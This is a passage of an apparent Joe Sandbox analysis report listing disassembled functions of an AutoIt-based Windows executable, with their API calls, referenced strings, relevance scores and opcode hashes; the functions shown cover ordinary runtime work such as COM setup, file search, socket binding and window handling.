                                              • CoCreateInstance.OLE32(?,00000000,00000017,00F20B44,?), ref: 00F04136
                                              • IIDFromString.OLE32(?,?), ref: 00F041A9
                                              • VariantInit.OLEAUT32(?), ref: 00F04241
                                              • VariantClear.OLEAUT32(?), ref: 00F04293
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 636576611-1287834457
                                              • Opcode ID: ad9b42e809fa54ba81979da31f69dc808c24538d17431b9f08396e266a672b53
                                              • Instruction ID: 0964cc11c77558f6dc8613ce2c54c1bc3337a798ce9e15f632b73a92280b4101
                                              • Opcode Fuzzy Hash: ad9b42e809fa54ba81979da31f69dc808c24538d17431b9f08396e266a672b53
                                              • Instruction Fuzzy Hash: 7A61A1B1604301AFC711DF64D848B5ABBE4AF49754F00454DFA85AB2D1D770FD84EB92
                                              Function 00EFA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EFA4D5
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EFA5E8
                                                • Part of subcall function 00EF41CE: GetInputState.USER32 ref: 00EF4225
                                                • Part of subcall function 00EF41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF42C0
                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EFA505
                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EFA5D2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                              • String ID: *.*
                                              • API String ID: 1972594611-438819550
                                              • Opcode ID: 58f72b5e40896ec140a9dabc3d10226ab0de499513d796a36b71c8da2f9b2a9b
                                              • Instruction ID: d6435bd18ee5ae21cf03e0499c7a4968718e542a828b7b82431c94fce68b41e8
                                              • Opcode Fuzzy Hash: 58f72b5e40896ec140a9dabc3d10226ab0de499513d796a36b71c8da2f9b2a9b
                                              • Instruction Fuzzy Hash: 554151B190020EAFCF14EFA4C849AEEBBB4EF05314F145066E519BA191D770AE84DF52
                                              Function 00E8225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                              Download Yara Rule
                                              APIs
                                              • DefDlgProcW.USER32(?,?), ref: 00E822EE
                                              • GetSysColor.USER32(0000000F), ref: 00E823C3
                                              • SetBkColor.GDI32(?,00000000), ref: 00E823D6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Color$Proc
                                              • String ID:
                                              • API String ID: 929743424-0
                                              • Opcode ID: c04669280e0901f1e14ccec824e084bde9a2b97fb611dd1d30967e47d340ccd2
                                              • Instruction ID: cef806c9a02c2825dccf7c707d24c51ad04afef648836151c8f26c1c59606527
                                              • Opcode Fuzzy Hash: c04669280e0901f1e14ccec824e084bde9a2b97fb611dd1d30967e47d340ccd2
                                              • Instruction Fuzzy Hash: DB8128F0204448BEEA28763C8D68FFF255DDB42304B15611EF34EF5692CA5A8E02E376
                                              Function 00F02163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00F039AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F039D7
                                                • Part of subcall function 00F039AB: _wcslen.LIBCMT ref: 00F039F8
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F021BA
                                              • WSAGetLastError.WSOCK32 ref: 00F021E1
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00F02238
                                              • WSAGetLastError.WSOCK32 ref: 00F02243
                                              • closesocket.WSOCK32(00000000), ref: 00F02272
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 1601658205-0
                                              • Opcode ID: bb527f915ff1742a8b4a45b7ffb5a4ca45bb418cd9cbdde86c9c9acf9ad0611e
                                              • Instruction ID: dbd48c81e19f2edb0b545749874c4c67fbcf2aa34a1ebb4ae5649ccca2be767a
                                              • Opcode Fuzzy Hash: bb527f915ff1742a8b4a45b7ffb5a4ca45bb418cd9cbdde86c9c9acf9ad0611e
                                              • Instruction Fuzzy Hash: A951C171A00200AFEB10AF64C88AF6A77E5AB45724F148088F959AF3D3D670ED41DBA1
                                              Function 00F125A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 4042a98ec7d7218c8aab6b2685fcea056cac790790314c2bc5b4b7617aaa6d26
                                              • Instruction ID: d9c4237b0d85f992ee275007730347e64c804b85e6123d69c8ae513b6568a39c
                                              • Opcode Fuzzy Hash: 4042a98ec7d7218c8aab6b2685fcea056cac790790314c2bc5b4b7617aaa6d26
                                              • Instruction Fuzzy Hash: F42127317002148FD7509F56C894B9A7BE5EF95324F1D806CE849CB291DB31ED82EB90
                                              Function 00EEEBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00EEEC19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID: DOWN
                                              • API String ID: 2434400541-711622031
                                              • Opcode ID: 6c54546514a606a065b6fb02897f5d6e38f3f15c34bb8150e7dab90b39939820
                                              • Instruction ID: 4b67bb1950038059aa5b455c84ace42107ee492ea2531f62a4514cfb7855603a
                                              • Opcode Fuzzy Hash: 6c54546514a606a065b6fb02897f5d6e38f3f15c34bb8150e7dab90b39939820
                                              • Instruction Fuzzy Hash: 99E08C6619DBBA38B90821697C02DF6438C8F6A338B616246FC00F83C0ED906D8260A9
                                              Function 00F10BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00F10C44
                                              • _wcslen.LIBCMT ref: 00F10C7E
                                              • _wcslen.LIBCMT ref: 00F10CE8
                                              • _wcslen.LIBCMT ref: 00F10D50
                                              • _wcslen.LIBCMT ref: 00F10DD4
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F10E24
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F10E63
                                                • Part of subcall function 00E9FD60: _wcslen.LIBCMT ref: 00E9FD6B
                                                • Part of subcall function 00EE2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EE2AE8
                                                • Part of subcall function 00EE2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EE2B1A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 1103490817-719923060
                                              • Opcode ID: ebcf83414d1e375e973b718d493021e1daa47bc8abf1534bc21c19c5b6a62718
                                              • Instruction ID: bc28a8dd0951e81964f813a78a1d931cf283b983ebf73ab1806975d75c02423f
                                              • Opcode Fuzzy Hash: ebcf83414d1e375e973b718d493021e1daa47bc8abf1534bc21c19c5b6a62718
                                              • Instruction Fuzzy Hash: BFE1C2326043418FC714EF24C4419AAB7E5FF99324B14495CF89AAB392DF70ED86EB91
                                              Function 00E824C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8259A
                                              • GetSystemMetrics.USER32(00000007), ref: 00E825A2
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E825CD
                                              • GetSystemMetrics.USER32(00000008), ref: 00E825D5
                                              • GetSystemMetrics.USER32(00000004), ref: 00E825FA
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82617
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82627
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8265A
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E8266E
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00E8268C
                                              • GetStockObject.GDI32(00000011), ref: 00E826A8
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E826B3
                                                • Part of subcall function 00E819CD: GetCursorPos.USER32(?), ref: 00E819E1
                                                • Part of subcall function 00E819CD: ScreenToClient.USER32(00000000,?), ref: 00E819FE
                                                • Part of subcall function 00E819CD: GetAsyncKeyState.USER32(00000001), ref: 00E81A23
                                                • Part of subcall function 00E819CD: GetAsyncKeyState.USER32(00000002), ref: 00E81A3D
                                              • SetTimer.USER32(00000000,00000000,00000028,00E8199C), ref: 00E826DA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: ca0d68251dbf8fc1dc570a099a6e1b288c1bce2ee0cb9eb32c44f545d8550c15
                                              • Instruction ID: 5d2c914b08c2e0975a2136d9be9e6715da3d4637b32baf57f647a30ed12812aa
                                              • Opcode Fuzzy Hash: ca0d68251dbf8fc1dc570a099a6e1b288c1bce2ee0cb9eb32c44f545d8550c15
                                              • Instruction Fuzzy Hash: 6FB1AB71A002099FDB04EFA8CD45BEE3BB5FB48315F119229FA19AB290DB70E941DF51
                                              Function 00F18C9B Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00F18CB9
                                              • _wcslen.LIBCMT ref: 00F18CCD
                                              • _wcslen.LIBCMT ref: 00F18CF0
                                              • _wcslen.LIBCMT ref: 00F18D13
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F18D51
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F16551), ref: 00F18DAD
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F18DE6
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F18E29
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F18E60
                                              • FreeLibrary.KERNEL32(?), ref: 00F18E6C
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F18E7C
                                              • DestroyIcon.USER32(?,?,?,?,?,00F16551), ref: 00F18E8B
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F18EA8
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F18EB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 799131459-1154884017
                                              • Opcode ID: 58ab8daec523eb9e39ba71b767af5b2885fa99eb2810cbf4fac9d93e16046506
                                              • Instruction ID: 9368cee76c56689f383a450d19e7d27318152e9ae5231c48fbf15497c364024e
                                              • Opcode Fuzzy Hash: 58ab8daec523eb9e39ba71b767af5b2885fa99eb2810cbf4fac9d93e16046506
                                              • Instruction Fuzzy Hash: B961D1B1900219BEEB14DFA4DD41BFE77A8BB09760F108506FC15E61D0DBB4A981EBA0
                                              Function 00EF47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00EF4852
                                              • _wcslen.LIBCMT ref: 00EF485D
                                              • _wcslen.LIBCMT ref: 00EF48B4
                                              • _wcslen.LIBCMT ref: 00EF48F2
                                              • GetDriveTypeW.KERNEL32(?), ref: 00EF4930
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF4978
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF49B3
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF49E1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 1839972693-4113822522
                                              • Opcode ID: c96a8ad3ea57cc2ad22906a81131fa37d1d1e3e80ec0317ede81676b8b67193b
                                              • Instruction ID: db92dbbe111be31e670e622089d2a80ec6dfd33f3a910da390771272bc963fa4
                                              • Opcode Fuzzy Hash: c96a8ad3ea57cc2ad22906a81131fa37d1d1e3e80ec0317ede81676b8b67193b
                                              • Instruction Fuzzy Hash: DB71C2B26047169FC710EF24C88097BB7E4EF94758F10592CF999A72A1EB30DD45CB91
                                              Function 00EE62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00EE62BD
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EE62CF
                                              • SetWindowTextW.USER32(?,?), ref: 00EE62E6
                                              • GetDlgItem.USER32(?,000003EA), ref: 00EE62FB
                                              • SetWindowTextW.USER32(00000000,?), ref: 00EE6301
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE6311
                                              • SetWindowTextW.USER32(00000000,?), ref: 00EE6317
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EE6338
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EE6352
                                              • GetWindowRect.USER32(?,?), ref: 00EE635B
                                              • _wcslen.LIBCMT ref: 00EE63C2
                                              • SetWindowTextW.USER32(?,?), ref: 00EE63FE
                                              • GetDesktopWindow.USER32 ref: 00EE6404
                                              • GetWindowRect.USER32(00000000), ref: 00EE640B
                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00EE6462
                                              • GetClientRect.USER32(?,?), ref: 00EE646F
                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00EE6494
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EE64BE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                              • String ID:
                                              • API String ID: 895679908-0
                                              • Opcode ID: 67f111bedc0ade5d9de7c7e9b3aa002403b2048c48918bff702446032d7e5b2e
                                              • Instruction ID: a76eb48c69f3eeb4c1d112c239cf7ad7eec2b2753653ea9738a45ceaaa4c34f4
                                              • Opcode Fuzzy Hash: 67f111bedc0ade5d9de7c7e9b3aa002403b2048c48918bff702446032d7e5b2e
                                              • Instruction Fuzzy Hash: ED719B31900749AFDB20DFA9CE45AAEBBF5FF58748F10492CE196B22A0D775E940DB10
                                              Function 00F0076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00F00784
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00F0078F
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F0079A
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00F007A5
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00F007B0
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00F007BB
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00F007C6
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00F007D1
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00F007DC
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00F007E7
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00F007F2
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00F007FD
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00F00808
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00F00813
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00F0081E
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00F00829
                                              • GetCursorInfo.USER32(?), ref: 00F00839
                                              • GetLastError.KERNEL32 ref: 00F0087B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: 623a06a0028edbf9f6966518e360402ca1aa4c9bfe231e7d9c7c489f2d5dcd9f
                                              • Instruction ID: 4b9d0a4e99adbcf6b3d14e7a4291ccca23b87d69c8330174480368f4cd9b7c07
                                              • Opcode Fuzzy Hash: 623a06a0028edbf9f6966518e360402ca1aa4c9bfe231e7d9c7c489f2d5dcd9f
                                              • Instruction Fuzzy Hash: 3A416670D043196ADB10DFB68C8995EBFE8FF04354B50852AE11CE7291DA74D901DF91
                                              Function 00EA0456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                              Download Yara Rule
                                              APIs
                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00EA0456
                                                • Part of subcall function 00EA047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00F5170C,00000FA0,9E2016E5,?,?,?,?,00EC2753,000000FF), ref: 00EA04AC
                                                • Part of subcall function 00EA047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00EC2753,000000FF), ref: 00EA04B7
                                                • Part of subcall function 00EA047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00EC2753,000000FF), ref: 00EA04C8
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00EA04DE
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00EA04EC
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00EA04FA
                                                • Part of subcall function 00EA047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EA0525
                                                • Part of subcall function 00EA047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EA0530
                                              • ___scrt_fastfail.LIBCMT ref: 00EA0477
                                                • Part of subcall function 00EA0433: __onexit.LIBCMT ref: 00EA0439
                                              Strings
                                              • InitializeConditionVariable, xrefs: 00EA04D8
                                              • WakeAllConditionVariable, xrefs: 00EA04F2
                                              • SleepConditionVariableCS, xrefs: 00EA04E4
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00EA04B2
                                              • kernel32.dll, xrefs: 00EA04C3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
